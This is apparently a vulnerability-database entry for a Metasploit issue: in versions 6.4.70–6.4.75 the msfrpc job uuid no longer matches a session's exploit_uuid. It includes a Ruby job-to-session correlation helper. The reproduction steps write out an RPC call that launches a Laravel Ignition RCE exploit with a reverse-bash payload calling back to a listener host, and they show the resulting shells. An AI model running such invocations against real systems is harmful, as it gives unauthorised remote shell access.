Metasploit Framework exploit_uuid Correlation Vulnerability

Vulnerability Information

Vulnerability name: Metasploit Framework exploit_uuid Correlation Vulnerability

Vulnerability type: Other

Severity: Medium

Vulnerability description:

Affected products

Metasploit Framework is a widely used penetration-testing tool that provides a platform for developing, testing and running exploit code; security researchers and penetration testers use it extensively to assess the security of networks and applications. This issue affects Metasploit Framework versions 6.4.70 through 6.4.75.

Vulnerability details

This is a logic error: in Metasploit Framework 6.4.70 through 6.4.75, when an exploit module is run through msfrpc (module.execute), the uuid returned for the job does not match the exploit_uuid of the session it produces in session.list. Automation scripts and tools that attribute sessions to the jobs that created them by comparing those two values can no longer track sessions correctly, which hurts the efficiency and accuracy of automated penetration testing.

Impact analysis

The issue does not by itself lead to remote code execution or data exposure; it breaks the job-to-session correlation that Metasploit's session management exposes over the RPC interface. For researchers and penetration testers who drive large-scale testing from automation, session tracking keyed on exploit_uuid fails, management becomes more complex, and automated attack chains pick up nondeterminism that can lower their success rate. The behaviour is only reachable through the msfrpc API, which requires an authenticated RPC session (a token obtained from auth.login), so the practical risk is to the reliability of an operator's own workflow rather than to third parties; it should be treated as a regression that affected tooling has to work around.

Vendor: Rapid7

Product: Metasploit Framework

Affected versions: 6.4.70 <= version <= 6.4.75

Source: https://github.com/rapid7/metasploit-framework/issues/20411

Type: rapid7/metasploit-framework GitHub issue

Source summary

Steps to reproduce

Using msfrpc

rpc.call("module.execute", "exploit", "multi/php/ignition_laravel_debug_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "8080", "LHOST"=>"10.0.0.152", "PAYLOAD"=>"cmd/unix/reverse_bash", "LPORT"=>"4443"})

rpc.call("session.list")

But you can use any exploit.

Expected behavior

For versions up to and including 6.4.68, using the RPC for execution yields a valid exploit_uuid in the session list:

>> rpc.call("module.execute", "exploit", "multi/php/ignition_laravel_debug_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "8080", "LHOST"=>"10.0.0.152", "PAYLOAD"=>"cmd/unix/reverse_bash", "LPORT"=>"4443"}) 
=> {"job_id" => 0, "uuid" => "wztfnhvr"}
>> rpc.call("session.list")
=>
{1 =>
{"type" => "shell",
"tunnel_local" => "10.0.0.152:4443",
"tunnel_peer" => "172.19.0.2:55024",
"via_exploit" => "exploit/multi/php/ignition_laravel_debug_rce",
"via_payload" => "payload/cmd/unix/reverse_bash",
"desc" => "Command shell",
"info" => "",
"workspace" => "",
"session_host" => "127.0.0.1",
"session_port" => 8080,
"target_host" => "127.0.0.1",
"username" => "mitsos",
"uuid" => "qtg6iwhj",
"exploit_uuid" => "wztfnhvr",
"routes" => "",
"arch" => "cmd"}}

As you can see, the job uuid is the same as the exploit_uuid in the session list: wztfnhvr.

Current behavior

For versions 6.4.70-6.4.75 (the latest as of the time of reporting this), the job uuid and exploit_uuid are not the same:

>> rpc.call("module.execute", "exploit", "multi/php/ignition_laravel_debug_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "8080", "LHOST"=>"10.0.0.152", "PAYLOAD"=>"cmd/unix/reverse_bash", "LPORT"=>"4443"}) 
=> {"job_id" => 0, "uuid" => "t0qc3k89"}
>> rpc.call("session.list")
=>
{1 =>
{"type" => "shell",
"tunnel_local" => "10.0.0.152:4443",
"tunnel_peer" => "172.19.0.2:33796",
"via_exploit" => "exploit/multi/php/ignition_laravel_debug_rce",
"via_payload" => "payload/cmd/unix/reverse_bash",
"desc" => "Command shell",
"info" => "",
"workspace" => "",
"session_host" => "127.0.0.1",
"session_port" => 8080,
"target_host" => "127.0.0.1",
"username" => "mitsos",
"uuid" => "bo3zoqd4",
"exploit_uuid" => "csfmnwrp",
"routes" => "",
"arch" => "cmd"}}

The job UUID is t0qc3k89 while the exploit_uuid is csfmnwrp.

Metasploit version

>-6.4.70
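The job-to-session correlation that the issue and the summary above describe, as an added example that is not code from the issue or from Metasploit itself. It is written in the shape of the msfrpc-client gem's Msf::RPC::Client#call (the same rpc.call(...) the reporter uses), so `rpc` is assumed to be that client or anything responding to call(method, *args) with the same return shapes. The strict check implements the contract the reporter relies on (exploit_uuid equals the job uuid); the fallback that matches on via_exploit, via_payload and tunnel_local, and the FakeRpc stand-in that replays the two session lists copied from the transcripts above, are assumptions constructed for this example and are not Metasploit's own logic.

```ruby
# Added example, not code from the issue or from Metasploit itself.
# `rpc` is assumed to be an Msf::RPC::Client (msfrpc-client gem) or anything
# else that responds to call(method, *args) with the same return shapes.

MODULE_NAME = 'multi/php/ignition_laravel_debug_rce'
OPTS = {
  'RHOSTS' => '127.0.0.1', 'RPORT' => '8080', 'LHOST' => '10.0.0.152',
  'PAYLOAD' => 'cmd/unix/reverse_bash', 'LPORT' => '4443'
}.freeze

# Constructed sample data: the job hashes and session entries copied from the
# two transcripts in the issue (<= 6.4.68 vs 6.4.70-6.4.75), trimmed to the
# fields used below.
GOOD_JOB = { 'job_id' => 0, 'uuid' => 'wztfnhvr' }.freeze
GOOD_SESSIONS = {
  1 => { 'type' => 'shell', 'tunnel_local' => '10.0.0.152:4443',
         'via_exploit' => 'exploit/multi/php/ignition_laravel_debug_rce',
         'via_payload' => 'payload/cmd/unix/reverse_bash',
         'uuid' => 'qtg6iwhj', 'exploit_uuid' => 'wztfnhvr' }
}.freeze
BAD_JOB = { 'job_id' => 0, 'uuid' => 't0qc3k89' }.freeze
BAD_SESSIONS = {
  1 => { 'type' => 'shell', 'tunnel_local' => '10.0.0.152:4443',
         'via_exploit' => 'exploit/multi/php/ignition_laravel_debug_rce',
         'via_payload' => 'payload/cmd/unix/reverse_bash',
         'uuid' => 'bo3zoqd4', 'exploit_uuid' => 'csfmnwrp' }
}.freeze

# Strict correlation: the contract the reporter relies on (<= 6.4.68) is that a
# session's exploit_uuid equals the uuid module.execute returned for the job.
def sessions_for_job(job, sessions)
  sessions.select { |_id, s| s['exploit_uuid'] == job['uuid'] }.keys
end

# Fallback heuristic (an assumption for this example, not Metasploit logic):
# match on the module, payload and listener the job was started with, and only
# accept sessions that did not exist before the job was launched. Two jobs
# started concurrently with the same module and listener remain ambiguous.
def sessions_for_job_fallback(module_name, opts, before_ids, sessions)
  sessions.select do |id, s|
    !before_ids.include?(id) &&
      s['via_exploit'] == "exploit/#{module_name}" &&
      s['via_payload'] == "payload/#{opts['PAYLOAD']}" &&
      s['tunnel_local'] == "#{opts['LHOST']}:#{opts['LPORT']}"
  end.keys
end

# Launch the exploit and poll session.list until a session can be attributed
# to it. Returns [ids, :strict] when exploit_uuid matched, [ids, :fallback]
# when only the heuristic matched (the 6.4.70-6.4.75 behaviour), or
# [[], :none] when the deadline passes.
def run_and_wait(rpc, module_name, opts, timeout: 30, interval: 1)
  before_ids = rpc.call('session.list').keys
  job = rpc.call('module.execute', 'exploit', module_name, opts)
  deadline = Time.now + timeout
  loop do
    sessions = rpc.call('session.list')
    ids = sessions_for_job(job, sessions)
    return [ids, :strict] unless ids.empty?
    ids = sessions_for_job_fallback(module_name, opts, before_ids, sessions)
    return [ids, :fallback] unless ids.empty?
    return [[], :none] if Time.now >= deadline
    sleep interval
  end
end

# Constructed stand-in for the RPC client so the example runs offline: it
# answers module.execute with a fixed job and replays a list of successive
# session.list results (the last one repeats once the list is exhausted).
class FakeRpc
  def initialize(job, session_lists)
    @job = job
    @lists = session_lists.dup
  end

  def call(method, *_args)
    case method
    when 'module.execute' then @job
    when 'session.list' then @lists.size > 1 ? @lists.shift : @lists.first
    else raise ArgumentError, "unexpected RPC method #{method}"
    end
  end
end

if $PROGRAM_NAME == __FILE__
  [[GOOD_JOB, GOOD_SESSIONS], [BAD_JOB, BAD_SESSIONS]].each do |job, sessions|
    rpc = FakeRpc.new(job, [{}, {}, sessions])
    ids, how = run_and_wait(rpc, MODULE_NAME, OPTS, timeout: 5, interval: 0)
    puts "job #{job['uuid']}: session(s) #{ids.inspect} attributed via #{how}"
  end
end
```

Against a real msfrpcd, pass the Msf::RPC::Client obtained after auth.login in place of FakeRpc. On a version before 6.4.70 the helper returns :strict; on 6.4.70-6.4.75 it falls through to :fallback, which also serves as a runtime detector for the regression, at the cost of the ambiguity noted in the comment when several jobs share a module and listener.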


http://example.com/2025/07/30/github_2099811044/
Author: lianccc
Published: 30 July 2025